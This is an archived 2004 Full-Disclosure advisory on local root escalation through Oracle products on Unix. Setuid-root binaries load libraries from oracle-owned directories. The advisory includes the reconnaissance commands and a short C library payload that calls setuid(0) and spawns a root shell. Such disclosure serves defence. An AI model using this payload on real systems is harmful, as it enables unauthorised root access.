Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle prod

from [Juan Manuel Pascual] Network Security [Permanent Link]
Subject: [Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)
Date: Fri, 30 Jul 2004 11:28:39 +0200 
*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries 
==========----------
*

* Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc *All Versions*. (10g not tested)
* Date:* 10-05-2004
* Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others. * Impact:* Privilege elevation from oracle products installation owner (usually called oracle or ias ) to root.
* Author:* Juan Manuel Pascual Escriba <mailto:jmpascual@open3s.com>
* Status:* Vendor contacted details below. 



*INTRODUCTION:*

Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer, claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.


*PROBLEM SUMMARY:*

This software version
        - Oracle 8i Linux Platform
        - Oracle 9i Linux Platform
        - Oracle 8i HP-UX Platform
        - Oracle 9i Solaris Platform
        - Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
        - All versions tested in Unix platform (Universal?¿)

are suitable to privilege elevation from oracle software owner ( normally 
oracle,ias,
iasr2) to root.


*DESCRIPTION*

Oracle Libraries are installed owned by oracle in a default installation of the products commented above.

[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 lbs
drwxr-xr-x  15 iasr2    dba          512 Jan  7 12:13 ldap
drwxr-xr-x   3 iasr2    dba        12800 Nov 21 11:22 lib
drwxr-xr-x  13 iasr2    dba          512 Nov 21 14:04 network
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 ocommon
...

As you can see, the lib directory owner is iasr2, let's look for some setuid 
binaries

[pask@dimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo

[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s---   1 root     dba      2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s---   1 root     dba        12632 Nov 21 14:04 ./bin/nmo

And now, just could see the shared objects that the binaries depends.

[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
       libvppdc.so =>   /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
       libclntsh.so.9.0 =>      
/export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
       libwtc9.so =>    /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
       libthread.so.1 =>        /usr/lib/libthread.so.1
       libkstat.so.1 =>         /usr/lib/libkstat.so.1
        ....

[iasr2@dimoniet ora9ias_mid]$  ldd ./bin/nmo
       libnsl.so.1 =>   /usr/lib/libnsl.so.1
       libsocket.so.1 =>        /usr/lib/libsocket.so.1
       libgen.so.1 =>   /usr/lib/libgen.so.1
        .....

ups, it's not posible to achieve root privileges with this binary and by this 
way


For iasr2 user is too easy to create a so.lib, something like

#include #include 

_init() {
  printf("en el _init()\n");
  printf("Con PID=%i y EUID=%i",getpid(),getuid());
  setuid(0);
  system("/usr/bin/ksh");
  printf("Saliendo del Init()\n");
}



*IMPACT*

oracle,ias,iasr2 or iasdb users with local access can gain root privileges through oracle installation


*EXPLOIT*

        commented above.


*WORKAROUND*

        chown to root lib directory and parent directory.


*STATUS*

        Oracle Security Alerts explains in an email sent 26/07/2004 that  
"Oracle believes that
        only trusted users should have access to the local iasdb user account".

        I have no information about a patch or a solution from Oracle Corp.




--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            jmpascual@open3s.com
Barcelona - Denia - Spain              http://www.open3s.com

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform), Juan Manuel Pascual <=
Previous by Date:  Re: [Full-Disclosure] Re: Automated SSH login attempts?, Jan Muenther
Next by Date:  Re: [Full-Disclosure] Re: Automated SSH login attempts?, Stefan Janecek
Previous by Thread:  [Full-Disclosure] MDKSA-2004:078 - Updated OpenOffice.org packages fix libneon vulnerability, Mandrake Linux Security Team
Next by Thread:  [Fwd: Re: [Full-Disclosure] Re: Automated SSH login attempts?], Stefan Janecek
Indexes:  [Date] [Thread] [Top] [All Lists]